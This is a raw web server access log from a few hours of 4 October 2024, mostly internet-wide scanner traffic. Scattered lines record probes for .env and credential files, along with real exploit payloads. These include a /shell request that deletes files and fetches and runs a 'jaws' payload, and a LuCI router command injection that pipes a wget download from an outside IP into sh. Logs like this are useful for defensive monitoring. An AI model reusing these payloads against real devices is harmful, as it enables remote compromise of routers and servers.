8.209.98.9 - - [04/Oct/2024:00:58:40 +0200] "GET /pimcore/app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
185.191.126.213 - - [04/Oct/2024:00:58:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:00:59:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:00:59:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Oct/2024:01:00:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.15 - - [04/Oct/2024:01:05:20 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
141.98.11.79 - - [04/Oct/2024:01:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:01:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:01:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Oct/2024:01:11:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:01:16:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
92.176.78.171 - - [04/Oct/2024:01:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
149.50.103.48 - - [04/Oct/2024:01:19:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [04/Oct/2024:01:20:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.203.210.48 - - [04/Oct/2024:01:21:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Oct/2024:01:21:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.163 - - [04/Oct/2024:01:22:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [04/Oct/2024:01:22:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
143.244.152.43 - - [04/Oct/2024:01:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
185.224.128.59 - - [04/Oct/2024:01:29:01 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
178.211.139.188 - - [04/Oct/2024:01:29:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
4.151.230.245 - - [04/Oct/2024:01:32:32 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
178.211.139.188 - - [04/Oct/2024:01:32:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
4.151.230.245 - - [04/Oct/2024:01:32:54 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:33:06 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:33:50 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:33:52 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
118.26.36.18 - - [04/Oct/2024:01:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 7_2_1; Win64; x64) AppleWebKit/554.48 (KHTML, like Gecko) Chrome/53.0.2808 Safari/537.36"
118.26.36.18 - - [04/Oct/2024:01:33:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
118.26.36.18 - - [04/Oct/2024:01:33:58 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
118.26.36.18 - - [04/Oct/2024:01:33:58 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
4.151.230.245 - - [04/Oct/2024:01:34:22 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:34:36 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:34:39 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:35:17 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
4.151.230.245 - - [04/Oct/2024:01:35:56 +0200] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
178.211.139.188 - - [04/Oct/2024:01:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [04/Oct/2024:01:37:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:01:41:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
197.255.207.58 - - [04/Oct/2024:01:43:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:01:43:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:01:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.146 - - [04/Oct/2024:01:51:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.146 - - [04/Oct/2024:01:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.49 - - [04/Oct/2024:01:56:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [04/Oct/2024:01:59:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [04/Oct/2024:02:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [04/Oct/2024:02:03:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Oct/2024:02:04:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.114.28.102 - - [04/Oct/2024:02:06:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
185.191.126.213 - - [04/Oct/2024:02:09:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:02:16:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Oct/2024:02:17:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [04/Oct/2024:02:17:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Oct/2024:02:17:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
104.152.52.205 - - [04/Oct/2024:02:18:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
104.152.52.205 - - [04/Oct/2024:02:18:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
149.50.103.48 - - [04/Oct/2024:02:18:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [04/Oct/2024:02:20:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [04/Oct/2024:02:20:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
41.234.122.86 - - [04/Oct/2024:02:20:12 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.80.139.104/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
41.47.37.233 - - [04/Oct/2024:02:21:30 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.80.139.104/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
178.211.139.188 - - [04/Oct/2024:02:23:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [04/Oct/2024:02:27:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Oct/2024:02:28:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.37 - - [04/Oct/2024:02:29:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.37 - - [04/Oct/2024:02:29:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [04/Oct/2024:02:39:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.104 - - [04/Oct/2024:02:39:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.104 - - [04/Oct/2024:02:39:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.104 - - [04/Oct/2024:02:39:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.104 - - [04/Oct/2024:02:39:40 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.191.126.213 - - [04/Oct/2024:02:39:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.109 - - [04/Oct/2024:02:39:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [04/Oct/2024:02:40:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Oct/2024:02:42:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [04/Oct/2024:02:45:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Oct/2024:02:47:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.78 - - [04/Oct/2024:02:50:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Oct/2024:02:50:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.173 - - [04/Oct/2024:02:54:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.173 - - [04/Oct/2024:02:54:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Oct/2024:03:02:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
138.197.170.166 - - [04/Oct/2024:03:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
138.197.170.166 - - [04/Oct/2024:03:05:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.82/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
51.254.59.113 - - [04/Oct/2024:03:07:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.224.128.47 - - [04/Oct/2024:03:12:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.239.33.196 - - [04/Oct/2024:03:22:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
85.239.33.196 - - [04/Oct/2024:03:23:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
216.218.206.67 - - [04/Oct/2024:03:23:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:24:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.216.150.61 - - [04/Oct/2024:03:24:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
80.82.77.202 - - [04/Oct/2024:03:24:51 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
216.218.206.67 - - [04/Oct/2024:03:27:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
216.218.206.67 - - [04/Oct/2024:03:28:19 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:29:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.118 - - [04/Oct/2024:03:29:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [04/Oct/2024:03:32:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:34:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.168.34.60 - - [04/Oct/2024:03:36:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.60 - - [04/Oct/2024:03:37:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.60 - - [04/Oct/2024:03:37:02 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.224.128.47 - - [04/Oct/2024:03:40:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
87.120.115.119 - - [04/Oct/2024:03:40:37 +0200] "GET /.env HTTP/1.1" 404 309 "-" "AndroidDownloadManager/5.1 (Linux; U; Android 5.1; Z820 Build/LMY47D)"
87.120.115.119 - - [04/Oct/2024:03:40:37 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.115.119 - - [04/Oct/2024:03:41:48 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; SNE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:42:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.115.119 - - [04/Oct/2024:03:42:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.115.119 - - [04/Oct/2024:03:42:41 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16"
87.120.115.119 - - [04/Oct/2024:03:43:08 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5"
87.120.115.119 - - [04/Oct/2024:03:43:26 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 6.0; Lenovo A7000-a Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36"
87.120.115.119 - - [04/Oct/2024:03:44:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:44:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.115.119 - - [04/Oct/2024:03:45:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; G8343 Build/47.2.A.10.107; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.111 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/229.1.0.17.118;]"
87.120.115.119 - - [04/Oct/2024:03:45:32 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Moto E (4) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
185.224.128.47 - - [04/Oct/2024:03:47:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:03:48:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [04/Oct/2024:03:50:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:03:51:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.168.34.36 - - [04/Oct/2024:03:59:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.168.34.36 - - [04/Oct/2024:04:00:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.36 - - [04/Oct/2024:04:00:04 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.36 - - [04/Oct/2024:04:00:04 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
8.210.123.17 - - [04/Oct/2024:04:00:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
31.220.1.144 - - [04/Oct/2024:04:01:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:04:02:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Oct/2024:04:11:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
149.50.103.48 - - [04/Oct/2024:04:12:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
81.17.19.66 - - [04/Oct/2024:04:15:34 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.47 - - [04/Oct/2024:04:16:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.16.39.118 - - [04/Oct/2024:04:16:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [04/Oct/2024:04:19:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.33.80.243 - - [04/Oct/2024:04:19:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.155.90.118 - - [04/Oct/2024:04:20:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
31.220.1.144 - - [04/Oct/2024:04:20:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:04:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.181.251 - - [04/Oct/2024:04:24:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
31.220.1.144 - - [04/Oct/2024:04:25:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.11.46 - - [04/Oct/2024:04:25:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.79 - - [04/Oct/2024:04:26:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [04/Oct/2024:04:26:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.12 - - [04/Oct/2024:04:27:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
31.220.1.144 - - [04/Oct/2024:04:28:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:04:31:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Oct/2024:04:41:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
31.220.1.144 - - [04/Oct/2024:04:41:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
31.220.1.144 - - [04/Oct/2024:04:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.12 - - [04/Oct/2024:04:48:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
95.214.55.138 - - [04/Oct/2024:04:49:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.79.172.21 - - [04/Oct/2024:04:49:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
139.99.9.160 - - [04/Oct/2024:04:52:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
185.224.128.67 - - [04/Oct/2024:04:52:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.47 - - [04/Oct/2024:04:54:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.224.128.67 - - [04/Oct/2024:04:54:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
95.214.55.138 - - [04/Oct/2024:04:58:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.67 - - [04/Oct/2024:05:00:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
206.168.34.192 - - [04/Oct/2024:05:00:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.192 - - [04/Oct/2024:05:01:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.192 - - [04/Oct/2024:05:01:01 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
